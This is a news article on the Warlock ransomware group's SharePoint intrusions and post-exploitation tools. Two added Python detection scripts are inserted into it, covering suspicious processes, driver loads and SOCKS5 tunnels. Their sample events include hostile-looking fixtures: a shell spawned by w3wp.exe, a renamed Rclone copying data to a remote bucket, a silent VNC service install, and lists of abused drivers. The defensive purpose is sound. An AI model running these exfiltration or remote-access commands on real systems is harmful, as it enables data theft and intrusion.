Warlock Ransomware Group Augments Post-Exploitation Activities
Dark Reading
In a recent attack, the group showcased stealthier cross-network activity, thanks to its use of a new BYOVD technique and other tools.
Elizabeth Montalbano,Contributing Writer
March 17, 2026
4 Min Read
The Warlock ransomware group continues to exploit unpatched Microsoft SharePoint servers with a new focus on stealthier, more resilient post-exploitation activity, thanks to its use of a new bring your own vulnerable driver (BYOVD) technique and other strategic tools.
Warlock, also tracked as Water Manaul, kept the same initial access method throughout its attacks in the second half of last year, when it primarily targeted the technology, manufacturing, and government sectors in the US, Germany, and Russia, according to researchers at Trend Micro. In activity observed earlier this year, the group expanded what it does once inside a targeted environment, according to a report published this week.
"Our recent monitoring revealed that the Warlock ransomware group has enhanced its attack chain, including improved methods for persistence, lateral movement, and evasion," Trend Micro threat analysts wrote in the report.
These methods include abusing the vulnerable NSecKrnl.sys driver through a new BYOVD technique, as well as using the remote-access tool TightVNC and the reverse-proxy tool Yuze to conceal its activity as it spreads across networks, the researchers said.
These tactics come on top of the post-exploitation tools the group used previously: the Velociraptor digital forensics and incident response (DFIR) tool as its primary command-and-control (C2) framework, a single Cloudflare tunnel for remote access, and Rclone disguised as TrendSecurity.exe for exfiltration.
The researchers noted that the expanded toolset "gives Warlock multiple redundant [C2] channels that blend with legitimate network traffic, demonstrating deliberate investment in operational resilience and detection evasion."
Rapid Evolution of a Nascent Group
Warlock hasn't been on the ransomware scene for long but is evolving rapidly, according to Trend Micro. The group made its public debut last June on the Russian cybercrime forum RAMP and quickly claimed more than a dozen victims, including government agencies in multiple countries as well as private sector organizations.
Trend Micro researchers observed a Warlock attack in early January during which the threat actors spent 15 days inside a victim's network before executing the ransomware. The investigation tracked the earliest observed malicious activity of Warlock on the network to the SharePoint worker process (w3wp.exe) on the compromised server, suggesting that the group is continuing to exploit unpatched Microsoft SharePoint vulnerabilities on Internet-facing servers as its primary access point.
Indeed, last year Trend Micro observed Warlock exploiting SharePoint vulnerabilities, including a set of flaws affecting on-premises servers — spoofing flaw CVE-2025-49706, remote code execution bug CVE-2025-49704, and related vulnerabilities CVE-2025-53770 and CVE-2025-53771. While Warlock's post-compromise tradecraft is evolving, its initial access approach remains unchanged, which reinforces the ongoing risk posed when organizations delay patching of public-facing enterprise applications.
Warlock's Post-Exploitation Activity Enhancements
In the attack Trend Micro detected in January, the threat actors deviated from techniques seen in previous Warlock intrusions to improve persistence, lateral movement, and defense evasion. One key change was silently installing TightVNC as a Windows service via PsExec, giving the attackers persistent GUI-based remote access.
Later in the attack, Warlock deployed Yuze, a lightweight, C-based, open source reverse proxy tool, to establish SOCKS5 connections over ports 80, 443, and 53, so that its traffic blends with normal web and DNS activity and is harder to pick out.
The group also leveraged the BYOVD technique by exploiting a vulnerability in the NSecKrnl.sys driver to terminate security products at the kernel level, replacing the googleApiUtil64.sys driver used in earlier campaigns. This represents "a more advanced evolution of earlier driver abuse," the researchers noted.
These additions complement existing tactics such as Cloudflare tunnels for C2 and Rclone for data exfiltration, forming a layered and redundant attack chain designed to survive disruption, according to Trend Micro.
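The host-side behaviors described in this section (w3wp.exe spawning a shell on the SharePoint server, a VNC server installed through PsExec, Rclone renamed to TrendSecurity.exe, and a vulnerable driver loaded from an unusual path) all leave traces in ordinary process-creation and driver-load telemetry. The following detection logic is an added example written for this page, not code from Trend Micro or the article; the Sysmon-style events it runs over are constructed, the allowlist of expected w3wp.exe children and the list of remote-access service binaries are assumptions, and the command lines and paths are illustrative.

```python
"""Host-side detections for the Warlock post-exploitation chain (added example).

The records below are constructed Sysmon-style events, not real telemetry. They model
the tradecraft the article describes: the SharePoint worker process (w3wp.exe) spawning a
shell, TightVNC's tvnserver.exe started through PsExec's service stub, Rclone renamed
TrendSecurity.exe, and NSecKrnl.sys loaded from outside the drivers directory.
"""
from __future__ import annotations

import ntpath
from dataclasses import dataclass

SYSMON_PROCESS_CREATE = 1  # real Sysmon event IDs
SYSMON_DRIVER_LOAD = 6

# Assumed allowlist: ASP.NET legitimately compiles pages with csc.exe under w3wp.exe.
W3WP_ALLOWED_CHILDREN = {"csc.exe", "conhost.exe"}
# Driver names the article attributes to Warlock's BYOVD use (current and earlier campaign).
KNOWN_ABUSED_DRIVERS = {"nseckrnl.sys", "googleapiutil64.sys"}
# Assumed list of GUI remote-access servers worth flagging when a remote service stub starts them.
REMOTE_ACCESS_SERVICES = {"tvnserver.exe", "winvnc.exe"}
DRIVERS_DIR = r"c:\windows\system32\drivers"


@dataclass(frozen=True)
class Alert:
    rule: str
    detail: str


def base(path: str) -> str:
    return ntpath.basename(path).lower()


def check_process_create(ev: dict) -> list[Alert]:
    alerts: list[Alert] = []
    image, parent = base(ev["Image"]), base(ev["ParentImage"])
    # 1. w3wp.exe spawning anything outside its expected helpers: post-exploitation on the SharePoint server.
    if parent == "w3wp.exe" and image not in W3WP_ALLOWED_CHILDREN:
        alerts.append(Alert("w3wp_child_process", f"{parent} -> {ev['CommandLine']}"))
    # 2. Renamed tooling: the PE's OriginalFileName disagrees with the on-disk name (Rclone as TrendSecurity.exe).
    #    Some installers and updaters trip this too, so treat it as a triage signal rather than a verdict.
    original = ev.get("OriginalFileName", "").lower()
    if original and original != image:
        alerts.append(Alert("renamed_binary", f"{ev['Image']} has OriginalFileName {ev['OriginalFileName']}"))
    # 3. A known remote-access server started by PsExec's service stub: silent service install over SMB.
    if parent == "psexesvc.exe" and image in REMOTE_ACCESS_SERVICES:
        alerts.append(Alert("psexec_remote_access_service", ev["CommandLine"]))
    return alerts


def check_driver_load(ev: dict) -> list[Alert]:
    alerts: list[Alert] = []
    path = ev["ImageLoaded"]
    name, directory = base(path), ntpath.dirname(path).lower()
    # BYOVD drivers carry a valid vendor signature, so the signer alone is not a signal;
    # the file name and the load path are.
    if name in KNOWN_ABUSED_DRIVERS:
        alerts.append(Alert("known_vulnerable_driver", path))
    elif directory != DRIVERS_DIR:
        alerts.append(Alert("driver_outside_drivers_dir", path))
    return alerts


def run_detections(events: list[dict]) -> list[Alert]:
    alerts: list[Alert] = []
    for ev in events:
        if ev["EventID"] == SYSMON_PROCESS_CREATE:
            alerts.extend(check_process_create(ev))
        elif ev["EventID"] == SYSMON_DRIVER_LOAD:
            alerts.extend(check_driver_load(ev))
    return alerts


# Constructed sample events; paths and command lines are illustrative only.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
     "OriginalFileName": "csc.exe", "ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "CommandLine": "csc.exe /noconfig /fullpaths @page.cmdline"},
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe", "OriginalFileName": "Cmd.Exe",
     "ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe", "CommandLine": "cmd.exe /c whoami"},
    {"EventID": 1, "Image": r"C:\ProgramData\TrendSecurity.exe", "OriginalFileName": "rclone.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe", "CommandLine": r"TrendSecurity.exe copy C:\share remote:bucket"},
    {"EventID": 1, "Image": r"C:\Windows\PSEXESVC.exe", "OriginalFileName": "psexesvc.exe",
     "ParentImage": r"C:\Windows\System32\services.exe", "CommandLine": r"C:\Windows\PSEXESVC.exe"},
    {"EventID": 1, "Image": r"C:\ProgramData\TightVNC\tvnserver.exe", "OriginalFileName": "tvnserver.exe",
     "ParentImage": r"C:\Windows\PSEXESVC.exe", "CommandLine": "tvnserver.exe -install -silent"},
    {"EventID": 6, "ImageLoaded": r"C:\Users\Public\NSecKrnl.sys", "Signed": "true"},
    {"EventID": 6, "ImageLoaded": r"C:\Windows\System32\drivers\tcpip.sys", "Signed": "true"},
]

if __name__ == "__main__":
    for a in run_detections(SAMPLE_EVENTS):
        print(f"[{a.rule}] {a.detail}")
```

The driver check deliberately does not key on the signature: the point of BYOVD is that the driver is legitimately signed, so blocklisting by hash or name (Microsoft's vulnerable driver blocklist, or the names the article gives) and flagging loads from outside the drivers directory are what actually fire.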
Defending Against Warlock
Given how quickly even fledgling groups such as Warlock mature, defenders need to counter the specific tactics observed, the researchers said. They reiterated the need to patch public vulnerabilities immediately, particularly in widely used enterprise server technology such as SharePoint.
"Protecting these assets and the credentials they hold is critical to preventing initial access and in impeding post-exploitation activities, such as privilege escalation and domain dominance," the researchers noted.
In addition to patching, defenders can protect SharePoint and other Internet-facing assets by removing direct RDP or administrative interface exposure to the Internet and enforcing multifactor authentication (MFA) on all external access points, especially VPNs and email systems, they added.
Trend Micro also advised organizations to actively monitor for abuse of legitimate administrative and remote access tools, set up detections for anomalous driver activity and kernel-level tampering, and maintain consistent visibility into lateral movement and proxy-based C2 channels, to defend specifically against the tactics observed in the recent Warlock attack.
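Visibility into proxy-based C2 over ports 80, 443, and 53 comes down to checking that what flows over a port is the protocol the port implies. The following is an added example, not code from the article or from the Yuze project: it inspects the first bytes a client sends on a TCP connection and flags either a literal SOCKS5 greeting (RFC 1928) or a payload that is not TLS on 443, HTTP on 80, or DNS on 53. The flow records and payloads are constructed; the addresses are documentation ranges.

```python
"""Protocol/port mismatch detection for proxy tunnels hiding on 80, 443 and 53 (added example).

Input is a list of constructed TCP flow records, not real captures: destination port plus the
first bytes the client sent. Two signals are checked: a literal SOCKS5 greeting (RFC 1928: 0x05,
NMETHODS, then NMETHODS method bytes) and, more generally, a payload that is not the protocol
the destination port implies (TLS on 443, HTTP on 80, DNS on 53).
"""
from __future__ import annotations

from dataclasses import dataclass

HTTP_METHODS = (b"GET ", b"POST ", b"HEAD ", b"PUT ", b"DELETE ", b"OPTIONS ", b"PATCH ", b"CONNECT ")


@dataclass(frozen=True)
class Flow:
    src: str
    dst: str
    dport: int
    payload: bytes  # first bytes sent by the client on the connection


def is_socks5_greeting(p: bytes) -> bool:
    # VER=0x05, NMETHODS>=1, exactly NMETHODS method bytes follow (RFC 1928 section 3).
    return len(p) >= 3 and p[0] == 0x05 and p[1] >= 1 and len(p) == 2 + p[1]


def looks_like_tls_client_hello(p: bytes) -> bool:
    # TLS record header: ContentType 0x16 (handshake), version major 0x03; the handshake
    # message type at offset 5 is 0x01 for ClientHello.
    return len(p) >= 6 and p[0] == 0x16 and p[1] == 0x03 and p[5] == 0x01


def looks_like_http_request(p: bytes) -> bool:
    return p.startswith(HTTP_METHODS)


def looks_like_dns_query_over_tcp(p: bytes) -> bool:
    # DNS over TCP (RFC 1035 4.2.2): 2-byte length prefix, then a 12-byte header.
    # A query has QR=0 in the flags and at least one question.
    if len(p) < 14:
        return False
    length = int.from_bytes(p[:2], "big")
    flags = int.from_bytes(p[4:6], "big")
    qdcount = int.from_bytes(p[6:8], "big")
    return length == len(p) - 2 and (flags & 0x8000) == 0 and qdcount >= 1


EXPECTED_PROTOCOL = {443: looks_like_tls_client_hello, 80: looks_like_http_request, 53: looks_like_dns_query_over_tcp}


def classify(flow: Flow) -> str | None:
    """Return a finding label, or None when the payload matches what the port implies."""
    if is_socks5_greeting(flow.payload):
        return f"socks5_greeting_on_{flow.dport}"
    checker = EXPECTED_PROTOCOL.get(flow.dport)
    if checker is not None and not checker(flow.payload):
        return f"protocol_port_mismatch_{flow.dport}"
    return None


def scan(flows: list[Flow]) -> list[tuple[str, str, str]]:
    """(src, dst, label) for every flagged flow."""
    out = []
    for f in flows:
        label = classify(f)
        if label:
            out.append((f.src, f.dst, label))
    return out


def dns_query_over_tcp(name: str) -> bytes:
    # Build a minimal A query with the TCP length prefix, used to construct the benign sample.
    qname = b"".join(len(l).to_bytes(1, "big") + l.encode() for l in name.split(".")) + b"\x00"
    body = b"\x12\x34" + b"\x01\x00" + b"\x00\x01" + b"\x00\x00" * 3 + qname + b"\x00\x01" + b"\x00\x01"
    return len(body).to_bytes(2, "big") + body


# Constructed flows; addresses are documentation ranges, payloads are illustrative.
SAMPLE_FLOWS = [
    Flow("10.0.0.5", "198.51.100.7", 443, b"\x16\x03\x01\x00\xc8\x01\x00\x00\xc4\x03\x03" + b"\x00" * 32),
    Flow("10.0.0.5", "198.51.100.8", 80, b"GET / HTTP/1.1\r\nHost: example.com\r\n\r\n"),
    Flow("10.0.0.5", "198.51.100.9", 53, dns_query_over_tcp("example.com")),
    Flow("10.0.0.17", "203.0.113.4", 443, b"\x05\x01\x00"),                 # SOCKS5, no-auth, on the HTTPS port
    Flow("10.0.0.17", "203.0.113.4", 53, b"\x05\x02\x00\x02"),              # SOCKS5 offering no-auth and user/pass
    Flow("10.0.0.17", "203.0.113.5", 443, b"\x00\x00\x00\x10relay-hello"),  # unencrypted custom framing, not TLS
    Flow("10.0.0.17", "203.0.113.5", 80, b"\x05\x01\x00"),
]

if __name__ == "__main__":
    for src, dst, label in scan(SAMPLE_FLOWS):
        print(f"{src} -> {dst}: {label}")
```

Because Yuze is a reverse proxy, the compromised host opens the outbound connection and the SOCKS5 negotiation may run from the attacker's side or be wrapped in the tool's own framing, which the article does not describe; the literal greeting check is therefore the weaker of the two signals, and the protocol/port mismatch check is the one to rely on. If a tunnel wraps itself in genuine TLS on 443, neither check fires, and detection falls back to destination reputation and long-lived-connection baselining.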
About the Author
Elizabeth Montalbano
Contributing Writer
Elizabeth Montalbano is a freelance writer, journalist, and therapeutic writing mentor with more than 25 years of professional experience. Her areas of expertise include technology, business, and culture. Elizabeth previously lived and worked as a full-time journalist in Phoenix, San Francisco, and New York City; she currently resides in a village on the southwest coast of Portugal. In her free time, she enjoys surfing, hiking with her dogs, traveling, playing music, yoga, and cooking.